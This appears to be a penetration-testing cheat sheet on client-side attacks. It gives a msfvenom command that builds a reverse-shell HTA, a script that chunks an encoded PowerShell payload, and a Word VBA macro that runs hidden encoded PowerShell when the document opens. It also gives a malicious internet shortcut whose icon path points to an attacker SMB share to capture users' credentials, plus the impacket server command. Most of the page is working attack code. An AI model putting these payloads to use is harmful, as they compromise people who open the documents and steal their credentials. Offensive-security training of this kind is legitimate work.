Skip to content

ClienSide

Client Side Attacks GPLv3 license

Word Macro

Make evil VBS
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 -f hta-psh -o evil.hta
split.py
str = "powershell.exe -nop -w hidden -e aQBmACgAWwB..ADsA"
n = 50

for i in range(0, len(str), n):
        print("Str = Str + " + '"' + str[i:i+n] + '"')
macro VBA
Sub AutoOpen()
    EvilMacro
End Sub

Sub Document_Open()
    EvilMacro
End Sub

Sub EvilMacro()
    Dim Str As String

    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
    Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
    Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
    Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
    ...
    Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
    Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
    Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
    Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="

    CreateObject("Wscript.Shell").Run Str
End Sub

Save macro as Word 97-2003 Document

Check macro with olevba 

[root@kali xpl]# olevba evil.doc
olevba 0.60 on Python 3.10.4 - http://decalage.info/python/oletools
===============================================================================
FILE: evil.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: evil.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
...SNIP..

ShortCut

@evil.url
[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.49.241\SERVER\%USERNAME%.icon
IconIndex=1
smbserver
impacket-smbserver -smb2support SERVER $(pwd)